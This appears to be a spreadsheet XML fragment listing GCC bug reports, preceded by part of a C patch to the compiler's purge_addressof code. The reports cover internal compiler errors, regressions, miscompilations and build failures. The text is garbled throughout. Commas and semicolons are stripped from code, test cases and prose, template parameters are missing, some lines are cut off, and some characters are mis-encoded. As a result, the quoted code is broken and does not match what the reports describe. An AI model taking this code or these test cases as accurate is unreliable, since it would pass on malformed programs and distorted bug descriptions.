 -      purge_addressof_1 (
 -      purge_addressof_1 (
 -      return
 +      result = purge_addressof_1 (
 +      result 
 +      return result
      }
    /* Scan all subexpressions. */
 @@ -331311 +332213 @@ purge_addressof_1 (loc insn force sto
    for (i = 0 i &lt; GET_RTX_LENGTH (code) i++ fmt++)
      {
        if (*fmt == 'e')
 -	purge_addressof_1 (
 +	result 
        else if (*fmt == 'E')
  	for (j = 0 j &lt; XVECLEN (x i) j++)
 -	  purge_addressof_1 (
 +	  result 
      }
 +
 +  return result
  }
  /* Return a new hash table entry in HT.  */
 @@ -34376 +344816 @@ compute_insns_for_mem (insns last_insn
  	}
  }
 +/* Helper function for purge_addressof called through for_each_rtx.
 +   Returns true iff the rtl is an ADDRESSOF.  */
 +static int
 +is_addressof (rtl data)
 +     rtx * rtl
 +     void * data ATTRIBUTE_UNUSED
 +{
 +  return GET_CODE (* rtl) == ADDRESSOF
 +}
 +
  /* Eliminate all occurrences of ADDRESSOF from INSNS.  Elide any remaining
     (MEM (ADDRESSOF)) patterns and force any needed registers into the
     stack.  */
 @@ -34659 +348630 @@ purge_addressof (insns)
      if (GET_CODE (insn) == INSN || GET_CODE (insn) == JUMP_INSN
  	|| GET_CODE (insn) == CALL_INSN)
        {
 -	purge_addressof_1 (&amp;PATTERN (insn) insn
 -			   asm_noperands (PATTERN (insn)) &gt; 0 0 
 -	purge_addressof_1 (
 +	if (! purge_addressof_1 (&amp;PATTERN (insn) insn
 +				 asm_noperands (PATTERN (insn)) &gt; 0 0 &amp;ht))
 +	  /* If we could not replace the ADDRESSOFs in the insn
 +	     something is wrong.  */
 +	  abort ()
 +
 +	if (! purge_addressof_1 (&amp;REG_NOTES (insn) NULL_RTX 0 0 &amp;ht))
 +	  {
 +	    /* If we could not replace the ADDRESSOFs in the insn's notes
 +	       we can just remove the offending notes instead.  */
 +	    rtx note
 +
 +	    for (note = REG_NOTES (insn) note note = XEXP (note 1))
 +	      {
 +		/* If we find a REG_RETVAL note then the insn is a libcall.
 +		   Such insns must have REG_EQUAL notes as well in order
 +		   for later passes of the compiler to work.  So it is not
 +		   safe to delete the notes here and instead we abort.  */
 +		if (REG_NOTE_KIND (note) == REG_RETVAL)
 +		  abort ()
 +		if (for_each_rtx (&amp; note is_addressof NULL))
 +		  remove_note (insn note)
 +	      }
 +	  }
        }
    /* Clean up.  */
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-19012</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE on testsuite/gcc.c-torture/execute/930208-1.c with -fpack-struct -Os</t>
  </si>
  <si>
    <t>No failure was seen the last time i686-novell-netware tests were published
(August this year) so this looks like a regression.
As far as I can tell insn-attrtab.c is generated incorrectly in that the
*addqi_1_slp case of get_attr_memory references a non-existing operands[2]. This
in turn seems to result from the
if_then_else (match_operand:QI 1 incdec_operand )
which throughout the whole i386.md is the only case where this is being used on
operand 1 the define_attr memory depends on this only being used on operand 2.
An additional question here would also be why *addqi_1_slp and *subqi_1_slp are
not symmetric.</t>
  </si>
  <si>
    <t>jbeulich</t>
  </si>
  <si>
    <t>GCC-32756</t>
  </si>
  <si>
    <t>[4.3 Regression] wrong ambiguous overload error?</t>
  </si>
  <si>
    <t>Hi 
this might be invalid needs verification. starting with gcc 4.3 the following testcase is rejected: 
=== Cut ===
class QString
struct QByteArray
{
  QByteArray ()
  bool operator!= (const QString 
}
bool operator!= (const QByteArray 
struct QString
{
  QString ()
  QString (const QByteArray 
}
QByteArray abbreviation ()
void
fromString ()
{
  QByteArray zoneAbbrev
  if (abbreviation () != zoneAbbrev)
    {
    }
}
=== Cut ===
ambiguity.cc:23: error: ISO C++ says that these are ambiguous even though the worst conversion for the first is better than the worst conversion for the second:
ambiguity.cc:9: note: candidate 1: bool operator!=(const QByteArray&amp; const QByteArray&amp;)
ambiguity.cc:6: note: candidate 2: bool QByteArray::operator!=(const QString&amp;) const</t>
  </si>
  <si>
    <t>GCC-63649</t>
  </si>
  <si>
    <t>[5 Regression] ICE: Segmentation fault in gcc/ipa-comdats.c:332</t>
  </si>
  <si>
    <t>The following code causes an ICE:
struct Per_cpu_ctor_data
{
  typedef void (*Func)()
  Per_cpu_ctor_data() = default
  void *_base
}
class Per_cpu_data
{
private:
  typedef Per_cpu_ctor_data Ctor
  struct Ctor_vector { void push_back(Ctor::Func func) }
  static Ctor_vector ctors
}
template
class Per_cpu : private Per_cpu_data
{
public:
  typedef T Type
  Per_cpu()
  static void f1()
}
template Per_cpu::Per_cpu() { ctors.push_back( }
template void Per_cpu::f1() {}
class A { static Per_cpu a }
static Per_cpu_ctor_data __b
__attribute__((init_priority(0xfffe))) Per_cpu A::a
$ g++ --version
g++ (GCC) 5.0.0 20141026 (experimental)
$ uname -m
x86_64
$ g++ -c -std=c++0x -O1 t.i
mem_space.i:31:59: internal compiler error: Segmentation fault
 __attribute__((init_priority(0xfffe))) Per_cpu A::a
                                                           ^
0xc022af crash_signal
        ../../gcc/gcc/toplev.c:349
0x11df22c ipa_comdats
        ../../gcc/gcc/ipa-comdats.c:330
0x11df22c execute
        ../../gcc/gcc/ipa-comdats.c:371
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
I could not reduce the testcase more as the segfault would not happen.
The segfault also does not happen with -O0 and it also does not happen with init_priority 0xffff.
Code compiles with gcc &lt;= 4.9.</t>
  </si>
  <si>
    <t>GCC-543</t>
  </si>
  <si>
    <t>dwarfout.c ICE during bootstrap simplified</t>
  </si>
  <si>
    <t>The following is a simplification of a bootstrap ICE seen
on OpenSerer
Release:
unknown
Environment:
i686-pc-linux-gnu
How-To-Repeat:
$ cat x.c
static void
expand_nl_goto_receiver ()
{
    {
      static struct elims {int from to} elim_regs[] = {{ 16 7} { 16 6} { 20 7} { 20 6}}
        if (elim_regs[0].from == 16
            &amp;&amp; elim_regs[0].to == 6)
        abort()
    }
}
$ stage1/xgcc -Bstage1/ -O2 -gdwarf x.c</t>
  </si>
  <si>
    <t>robertlipe</t>
  </si>
  <si>
    <t>GCC-20216</t>
  </si>
  <si>
    <t>[4.0 Regression] Simple loop runs out of stack at -O1</t>
  </si>
  <si>
    <t>Following test case runs out of stack space when
gcc tries to compute factorial (1599999). I have a patch which does two simple things. 1) it rewrites 
tree_fold_factorial
function into its non-recursive version and 2) it sets a limit before deciding to call chrec_evaluate. This 
limit is arbitrary in this
patch. Author of the algorithm may want to decide when to stop evaluating feasibility of this 
optimization. Note that even with this limit
the computed factorial overflows. So even a much smaller limit is needed if this value is significant.
/* bad.c */
static unsigned int *buffer
void FUNC (void)
{
 unsigned int *base
 int i j
 for (i = 0 i &lt; 4 i++)
  for (j = 0 j &lt; 1600000 j++)
   *base++ = buffer[j]
}
% mygccm5 -c -O1 bad.c
Out of stack space.
Try running 'limit stacksize unlimited' in the shell to raise its limit.</t>
  </si>
  <si>
    <t>fjahanian</t>
  </si>
  <si>
    <t>GCC-4156</t>
  </si>
  <si>
    <t>[sco3.2v5] pic/libgcc.a</t>
  </si>
  <si>
    <t xml:space="preserve">	`libgcc.a' is always compiled with `-fpic' (as set in
	`t-sco5gas') but it is not linked to `pic' subdir.  One has
	to do this manually to build a shared library with gcc.
Release:
3.0.1
Environment:
System: SCO_SV d-fens 3.2 2 i386
host: i586-pc-sco3.2v5.0.2
build: i586-pc-sco3.2v5.0.2
target: i586-pc-sco3.2v5.0.2
configured with:  : (reconfigured)  : (reconfigured) ../gcc-3.0/configure --without-included-gettext --prefix=/usr --with-as=/usr/bin/gas --enable-multilib --disable-static --enable-shared --with-system-zlib --program-transform-name=s/cpp/gcpp/ : (reconfigured) ../gcc-3.0.1/configure --without-included-gettext --prefix=/usr --with-as=/usr/bin/gas --enable-multilib --disable-static --enable-shared --with-system-zlib --program-transform-name=s/cpp/gcpp/</t>
  </si>
  <si>
    <t>gin</t>
  </si>
  <si>
    <t>GCC-36660</t>
  </si>
  <si>
    <t>pb_ds/detail/resize_policy/sample_resize_trigger.hpp has extra closing brace</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/viewcvs/trunk/libstdc%2B%2B-v3/include/ext/pb_ds/detail/resize_policy/sample_resize_trigger.hpp?revision=130805&amp;view=markup
Closes namespace it did not open (apparently).
It has
----
} // namespace __gnu_pbds
----
without a corresponding 
namespace __gnu_pbds {
-----</t>
  </si>
  <si>
    <t>GCC-65727</t>
  </si>
  <si>
    <t>[4.8/4.9/5/6 Regression] Segfault With Decltype In Lambda Expression Used To Initialize Static Class Member</t>
  </si>
  <si>
    <t>Created attachment 35284
Minimal Test Case
Using version 4.8.2 of g++ in an x86 environment a segfault is possible with the attached code
The build of this compiler was performed via the following slackware build script
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/source/d/gcc/gcc.SlackBuild
When the file is built the following output is produced:
---------------------------------------------------
$ g++ -std=c++11 gcc-4.8.2-bug.cpp 
gcc-4.8.2-bug.cpp: In lambda function:
gcc-4.8.2-bug.cpp:22:55: internal compiler error: Segmentation fault
 type_b type_e::b = {{[](){decltype(function_c(type_e::d))::dummy()}}}
                                                       ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
---------------------------------------------------
It looks like there are some similar bugs which have been fixed in the past but none of them seem to have the same requirements as this segfault.
Additionally the codebase which produced this issue has been reported to produce segfaults in version 4.9.1 though it is unknown if this minimal test case produces the segfault in the more recent versions.</t>
  </si>
  <si>
    <t>mmccurry</t>
  </si>
  <si>
    <t>GCC-19537</t>
  </si>
  <si>
    <t>tic4x does not build -- ICE in libgcc</t>
  </si>
  <si>
    <t>This does not appear to be the same as
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=14436.
binutils 2.15 gcc from CVS as or 2005-01-19.
This should be reproducible in any other tic4x target.
./gcc/configure --target=tic4x-rtems4.7 --enable-threads=rtems
--prefix=/opt/rtems-test --with-gnu-as --with-gnu-ld --with-newlib --verbose
--with-system-zlib --disable-nls --enable-version-specific-runtime-libs
--enable-languages=c
/usr3/ftp_archive/gnu/gcc/ss/b-head/b-tic4x-rtems4.7/gcc/xgcc
-B/usr3/ftp_archive/gnu/gcc/ss/b-head/b-tic4x-rtems4.7/gcc/ -nostdinc
-B/usr3/ftp_archive/gnu/gcc/ss/b-head/b-tic4x-rtems4.7/tic4x-rtems4.7/newlib/
-isystem
/usr3/ftp_archive/gnu/gcc/ss/b-head/b-tic4x-rtems4.7/tic4x-rtems4.7/newlib/targ-include
-isystem /usr3/ftp_archive/gnu/gcc/ss/b-head/gcc/newlib/libc/include
-B/opt/rtems-test/tic4x-rtems4.7/bin/ -B/opt/rtems-test/tic4x-rtems4.7/lib/
-isystem /opt/rtems-test/tic4x-rtems4.7/include -isystem
/opt/rtems-test/tic4x-rtems4.7/sys-include -O2
-I../../gcc/gcc/../newlib/libc/sys/rtems/include -DIN_GCC -DCROSS_COMPILE   -W
-Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-Wold-style-definition  -isystem ./include  -Dexit=unused_exit -g
-DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I
-I../../gcc/gcc -I../../gcc/gcc/ -I../../gcc/gcc/../include
-I../../gcc/gcc/../libcpp/include  -DL_subvsi3 -c ../../gcc/gcc/libgcc2.c -o
libgcc/./_subvsi3.o
../../gcc/gcc/libgcc2.c: In function '__do_global_ctors':
../../gcc/gcc/libgcc2.c:1674: internal compiler error: in integer_all_onesp at
tree.c:995
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-596</t>
  </si>
  <si>
    <t>SEGV on illegal code when using undeclared functions and members</t>
  </si>
  <si>
    <t>G++ violates segments when I from an undeclared member function call an undefined function.
I'm normally not that stoopid - it just occurred when isolating another ICE source! (honest!)
Release:
gcc version 2.96 20000731 (experimental)
Environment:
Linux 2.2.16-3 i586
How-To-Repeat:
Example code is:
-----------
class C {}
void C::a() {
    b()
}
-----------End-of-code
Compiler output is:
----------------------
[ao@jernhamsteren dynmod]$ g++ -v test3.cc
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (experimental)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ test3.cc /tmp/ccPz55Fz.ii
GNU CPP version 2.96 20000731 (experimental) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus /tmp/ccPz55Fz.ii -quiet -dumpbase test3.cc -version -o /tmp/ccyNPfOY.s
GNU C++ version 2.96 20000731 (experimental) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (experimental).
test3.cc:3: no `void C::a ()' member function declared in class `C'
test3.cc: In method `void C::a ()':
test3.cc:4: `b' undeclared (first use this function)
test3.cc:4: (Each undeclared identifier is reported only once for each 
function it appears in.)
test3.cc:4: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
---------------End-of-output
(I'm not sure if that '-v' option contributed with anything interresting but... here you are...)</t>
  </si>
  <si>
    <t>GCC-80591</t>
  </si>
  <si>
    <t>[7/8 Regression] AArch64 kernel miscompilation starting with r246809</t>
  </si>
  <si>
    <t>struct S {
 char p[6300]
 int s
}
static inline __attribute__((always_inline)) struct S *
foo (void)
{
  unsigned long sp
  asm ( : =r (sp))
  return (struct S *) sp
}
void
bar (void)
{
  foo ()-&gt;s++
}
is miscompiled starting with r246809 at -O2 (tried cross to aarch64-linux as well as x86_64-linux native) the increment is optimized away.</t>
  </si>
  <si>
    <t>GCC-52141</t>
  </si>
  <si>
    <t>[trans-mem] ICE due to asm statement in trans-mem.c:expand_block_tm</t>
  </si>
  <si>
    <t>Created attachment 26591
testcase ICE with -fgnu-tm -O1
In the continuation of PRs: 46269 47606 51443.
../../trunk-debug/gcc/xgcc -B ../../trunk-debug/gcc -fgnu-tm -O1 -S -o ICE-inline.s ICE-inline2.c
ICE-inline2.c:2:13: warning: always_inline function might not be inlinable [-Wattributes]
ICE-inline2.c:13:5: internal compiler error: in expand_block_tm at trans-mem.c:2366
(gdb) bt
...
#5  0x0000000000b1714f in expand_block_tm (region=0x1b99160 bb=0x7ffff69aa208) at ../../trunk/gcc/trans-mem.c:2366
#6  0x0000000000b17455 in execute_tm_mark () at ../../trunk/gcc/trans-mem.c:2467
#7  0x0000000000a1672f in execute_one_pass (pass=0x196c0a0) at ../../trunk/gcc/passes.c:2081
...</t>
  </si>
  <si>
    <t>patrick.marlier</t>
  </si>
  <si>
    <t>GCC-79505</t>
  </si>
  <si>
    <t>[7 Regression] Memory leaks in oacc_loop_discover_walk</t>
  </si>
  <si>
    <t>Hello.
Starting from r245300 I can see following leaks:
$ valgrind --leak-check=yes --trace-children=yes gcc /home/marxin/Programming/gcc/gcc/testsuite/c-c++-common/goacc-gomp/nesting-1.c -fopenmp -c -fopenacc
==18313== 40 bytes in 1 blocks are definitely lost in loss record 17 of 806
==18313==    at 0x4C2B0AF: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==18313==    by 0x145C9BF: xrealloc (xmalloc.c:177)
==18313==    by 0xAB9643: reserve (vec.h:288)
==18313==    by 0xAB9643: reserve (vec.h:1445)
==18313==    by 0xAB9643: safe_push (vec.h:1554)
==18313==    by 0xAB9643: oacc_loop_discover_walk(oacc_loop* basic_block_def*) (omp-offload.c:900)
==18313==    by 0xAB98CB: oacc_loop_discover_walk(oacc_loop* basic_block_def*) (omp-offload.c:955)
==18313==    by 0xAB98CB: oacc_loop_discover_walk(oacc_loop* basic_block_def*) (omp-offload.c:955)
==18313==    by 0xAB9DD3: oacc_loop_discovery (omp-offload.c:991)
==18313==    by 0xAB9DD3: execute_oacc_device_lower (omp-offload.c:1450)
==18313==    by 0xAB9DD3: (anonymous namespace)::pass_oacc_device_lower::execute(function*) (omp-offload.c:1658)
==18313==    by 0xB222CD: execute_one_pass(opt_pass*) (passes.c:2465)
==18313==    by 0xB22B97: execute_pass_list_1(opt_pass*) (passes.c:2554)
==18313==    by 0xB22BF4: execute_pass_list(function* opt_pass*) (passes.c:2565)
==18313==    by 0x7F918D: cgraph_node::expand() (cgraphunit.c:2038)
==18313==    by 0x7FA172: output_in_order(bool) (cgraphunit.c:2281)
==18313==    by 0x7FA51D: symbol_table::compile() [clone .part.52] (cgraphunit.c:2525)</t>
  </si>
  <si>
    <t>GCC-28704</t>
  </si>
  <si>
    <t>%s substituted with static member/free can't be properly translated</t>
  </si>
  <si>
    <t>In cp/decl.c there is this code.
  error (qualified function types cannot be used to declare %s functions
	 (staticp? static member : free))
The strings static member and free are not available for translation in the po-file.  Even if they were it surely will not work in all languages to compose a sentence like this.  Please make it two separate strings with the complete sentences instead.</t>
  </si>
  <si>
    <t>GCC-34854</t>
  </si>
  <si>
    <t>Valid USE statement is rejected</t>
  </si>
  <si>
    <t>I think both testcases below are valid but gfortran rejects the
second one. They only differ in the order of USE statements.
$ cat test.f90
module common_init_conf
 integer allocatable dimension(::) :: Nmoltype_phase
end module common_init_conf
subroutine read_initial_config_nml()
 use common_init_conf nmoltype_phase_com =&gt; nmoltype_phase
 use common_init_conf
 implicit none
 integer :: nmoltype_phase
 namelist /confNmoltypePhase/ nmoltype_phase
end subroutine read_initial_config_nml
$ gfortran -c test.f90 &amp;&amp; echo OK
OK
$ cat test2.f90
module common_init_conf
 integer allocatable dimension(::) :: Nmoltype_phase
end module common_init_conf
subroutine read_initial_config_nml()
 use common_init_conf
 use common_init_conf nmoltype_phase_com =&gt; nmoltype_phase
 implicit none
 integer :: nmoltype_phase
 namelist /confNmoltypePhase/ nmoltype_phase
end subroutine read_initial_config_nml
$ gfortran -c test2.f90
test2.f90:9.27:
 integer :: nmoltype_phase
                         1
Error: Symbol 'nmoltype_phase' at (1) already has basic type of INTEGER
test2.f90:10.45:
 namelist /confNmoltypePhase/ nmoltype_phase
                                           1
Error: NAMELIST attribute conflicts with ALLOCATABLE attribute in 'nmoltype_phase' at (1)</t>
  </si>
  <si>
    <t>GCC-49735</t>
  </si>
  <si>
    <t>[4.7 Regression] mips64-elf libgcc build fails with apparently infinite recursion.</t>
  </si>
  <si>
    <t>Created attachment 24751
A testcase
Configure a cross compiler with --target=mips64-elf. When building libgcc cc1 goes into what seems to be an infinite recursion:
(gdb) bt
#0  0x083b22aa in estimate_calls_size_and_time (node= size=0xf7484030 time=0xf748402c 
    possible_truths=4294967294) at ../../trunk/gcc/ipa-inline-analysis.c:1748
#1  0x083b229d in estimate_calls_size_and_time (node= size=0xf7484030 time=0xf748402c 
    possible_truths=4294967294) at ../../trunk/gcc/ipa-inline-analysis.c:1743
#2  0x083b229d in estimate_calls_size_and_time (node= size=0xf7484030 time=0xf748402c 
    possible_truths=4294967294) at ../../trunk/gcc/ipa-inline-analysis.c:1743
I'm attaching the .i file.</t>
  </si>
  <si>
    <t>GCC-23513</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] overload resolution fails to select a more specialized template</t>
  </si>
  <si>
    <t>This well-formed complete source is rejected by g++ but compiles fine 
with comeau online 4.3.3 BETA August 4 2003.
A related discussion on clc++ http://groups-beta.google.com/group/comp.
lang.c++/msg/1475f4e8f1ff9982
struct A
{
    template void operator&lt;&lt;(T
}
template struct B {}
template void operator&lt;&lt;(A
int main()
{
    A a
    B b
    a &lt;&lt; b
}
[max@localhost exp]$ g++ -v -save-temps -Wall exp.cpp -o exp
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --
infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-
checking=release --with-system-zlib --enable-__cxa_atexit --disable-
libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++
objcjavaf95ada --enable-java-awt=gtk --with-java-home=/usr/lib/jvm/
java-1.4.2-gcj-1.4.2.0/jre --host=i386-redhat-linux
Thread model: posix
gcc version 4.0.1 20050727 (Red Hat 4.0.1-5)
 /usr/libexec/gcc/i386-redhat-linux/4.0.1/cc1plus -E -quiet -v -
D_GNU_SOURCE exp.cpp -Wall -fpch-preprocess -o exp.ii
ignoring nonexistent directory /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../
i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1/i386-redhat-
linux
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1/backward
 /usr/local/include
 /usr/lib/gcc/i386-redhat-linux/4.0.1/include
 /usr/include
End of search list.
 /usr/libexec/gcc/i386-redhat-linux/4.0.1/cc1plus -fpreprocessed exp.ii -quiet 
-dumpbase exp.cpp -auxbase exp -Wall -version -o exp.s
GNU C++ version 4.0.1 20050727 (Red Hat 4.0.1-5) (i386-redhat-linux)
	compiled by GNU C version 4.0.1 20050727 (Red Hat 4.0.1-5).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-
heapsize=64417
exp.cpp: In function 'int main()':
exp.cpp:13: error: ambiguous overload for 'operator&lt;&lt;' in 'a &lt;&lt; b'
exp.cpp:3: note: candidates are: void A::operator]
exp.cpp:7: note:                 void operator&amp;) [with T = A]
# 1 exp.cpp
# 1 
# 1 
# 1 exp.cpp
struct A
{
    template void operator&lt;&lt;(T
}
template struct B {}
template void operator&lt;&lt;(A
int main()
{
    A a
    B b
    a &lt;&lt; b
}</t>
  </si>
  <si>
    <t>maxim.yegorushkin</t>
  </si>
  <si>
    <t>GCC-2128</t>
  </si>
  <si>
    <t>gcc testsuite failures in long to long double conversion on alpha-dec-osf5.1</t>
  </si>
  <si>
    <t>As described in http://gcc.gnu.org/ml/gcc-patches/2001-02/msg01715.html I get
only a few additional testsuite failures on Tru64 UNIX V5.1 compared to V4.0F.
The list is as follows:
+FAIL: gcc.c-torture/execute/930622-2.c execution  -O0 
+FAIL: gcc.c-torture/execute/930622-2.c execution  -O1 
+FAIL: gcc.c-torture/execute/930622-2.c execution  -O2 
+FAIL: gcc.c-torture/execute/930622-2.c execution  -Os 
SEGV line 20
+FAIL: gcc.c-torture/execute/960513-1.c execution  -O0 
+FAIL: gcc.c-torture/execute/960513-1.c execution  -O1 
+FAIL: gcc.c-torture/execute/960513-1.c execution  -Os 
SEGV line 22
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -O0 
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -O1 
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -O2 
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -O3 -fomit-frame-pointer 
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -O3 -g 
+FAIL: gcc.c-torture/execute/va-arg-5.c execution  -Os 
SEGV line 32
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -O0 
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -O1 
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -O2 
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -O3 -fomit-frame-pointer 
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -O3 -g 
+FAIL: gcc.c-torture/execute/va-arg-6.c execution  -Os 
SEGV line 33
At least the first three failures seem to be due to problems with the conversion
from long to long double (which makes sort of sense since Tru64 V5 introduced
128-bit long double support compared to 64-bit long double in V4).
Release:
3.0 20010221 (prerelease)
Environment:
System: OSF1 bartok V5.1 732 alpha
Machine: alpha
host: alpha-dec-osf5.1
build: alpha-dec-osf5.1
target: alpha-dec-osf5.1
configured with: /vol/gnu/src/gcc/gcc-3.0-branch/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --enable-shared --disable-nls alpha-dec-osf5.1</t>
  </si>
  <si>
    <t>GCC-82396</t>
  </si>
  <si>
    <t>[8 Regression] qsort comparator non-negative on sorted output: 4 in ready_sort_real in haifa scheduler</t>
  </si>
  <si>
    <t>Using cross-compiler one can see after Alexander's commit (r253295):
$ cat /tmp/tmp4qfnk1d3.i
int a h
struct b
{
  int c
  double d
  int f
  double e
}
struct b g
int bar () { a = h }
int i (int j ...)
{
  __builtin_va_list b
  while (j--)
    {
      __builtin_va_start (b j)
      g = __builtin_va_arg(b struct b)
      bar ()
    }
}
$ arm-linux-gnueabi-gcc -Ofast --param sched-autopref-queue-depth=274589698 /tmp/tmp4qfnk1d3.i
/tmp/tmp4qfnk1d3.i: In function â€˜iâ€™:
/tmp/tmp4qfnk1d3.i:22:1: error: qsort comparator non-negative on sorted output: 4
 }
 ^
during RTL pass: sched2
/tmp/tmp4qfnk1d3.i:22:1: internal compiler error: qsort checking failed
0x5925f2 qsort_chk_error
	.././../gcc/vec.c:222
0x13061a5 qsort_chk(void* unsigned long unsigned long int (*)(void const* void const*))
	.././../gcc/vec.c:274
0x12233a8 ready_sort_real
	.././../gcc/haifa-sched.c:3087
0x122a60f schedule_block(basic_block_def** void*)
	.././../gcc/haifa-sched.c:6749
0xb0473a schedule_region
	.././../gcc/sched-rgn.c:3174
0xb0473a schedule_insns()
	.././../gcc/sched-rgn.c:3513
0xb04c9d schedule_insns()
	.././../gcc/sched-rgn.c:3498
0xb04c9d rest_of_handle_sched2
	.././../gcc/sched-rgn.c:3737
0xb04c9d execute
	.././../gcc/sched-rgn.c:3873</t>
  </si>
  <si>
    <t>GCC-31829</t>
  </si>
  <si>
    <t>FAIL: g++.dg/warn/multiple-overflow-warn-3.C  (test for warnings line 8)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/test/gnu/
gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/warn/
multiple-overflow-warn-3.C  -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.
11/libstdc++-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpu
x11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/g
nu/gcc/gcc/libstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsu
ite/util -fmessage-length=0  -Woverflow  -S  -o multiple-overflow-warn-3.s    (t
imeout = 300)
PASS: g++.dg/warn/multiple-overflow-warn-3.C  (test for bogus messages line 8)
FAIL: g++.dg/warn/multiple-overflow-warn-3.C  (test for warnings line 8)
PASS: g++.dg/warn/multiple-overflow-warn-3.C (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-35315</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with attribute transparent_union</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on mainline:
=================================================================
typedef union { int i } U __attribute__((transparent_union))
static void foo(U) {}
static void foo(int) {}
void bar()
{
  foo(0)
}
=================================================================
bug.cc: In function 'void bar()':
bug.cc:8: internal compiler error: same canonical type node for different types  and U
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-1507</t>
  </si>
  <si>
    <t>Latest GCC dec 12th doesn't bootstrap on i686.</t>
  </si>
  <si>
    <t>Bootstrap of the compiler fails on i686 (redhat 6.2) running kernel 2.2.18 glibc 2.1.3 and binutils 2.10.91
rm -f cxxmain.c
ln -s ./../libiberty/cplus-dem.c cxxmain.c
gcc -c -DMAIN  -DIN_GCC    -g  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I. -I./. -I./config -I./../include \
  -DVERSION=\2.97\ cxxmain.c
gcc -o c++filt  -DIN_GCC    -g  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H  \
  cxxmain.o underscore.o obstack.o        ../libiberty/libiberty.a
cd . &amp;&amp; makeinfo  -o cpp.info cpp.texi
cd . &amp;&amp; makeinfo  -o gcc.info gcc.texi
./install.texi:945: `.' or `' must follow cross reference not f.
./md.texi:2607: `.' or `' must follow cross reference not T.
./md.texi:2623: `.' or `' must follow cross reference not T.
makeinfo: Removing output file `gcc.info' due to errors use --force to preserve.
make[2]: *** [gcc.info] Error 2
make[2]: Leaving directory `/tmp/egcs/gcc'
make[1]: *** [stage_a] Error 2
make[1]: Leaving directory `/tmp/egcs/gcc'
make: *** [bootstrap] Error 2
Release:
gcc 2.97 - dec. 24 2000
Environment:
i686 Linux 2.2.18 (RH6.2)</t>
  </si>
  <si>
    <t>sefer</t>
  </si>
  <si>
    <t>GCC-34772</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] self-initialisation does not silence uninitialised warnings (-Winit-self ignored)</t>
  </si>
  <si>
    <t>The info manual says:
`-Winit-self (C C++ Objective-C and Objective-C++ only)'
     Warn about uninitialized variables which are initialized with
     themselves.  Note this option can only be used with the
     `-Wuninitialized' option which in turn only works with `-O1' and
     above.
     For example GCC will warn about `i' being uninitialized in the
     following snippet only when `-Winit-self' has been specified:
          int f()
          {
            int i = i
            return i
          }
However trying that exact example I get:
$ g++-4.2 -O -Wuninitialized -c warnings.cc 
warnings.cc: In function â€˜int f()â€™:
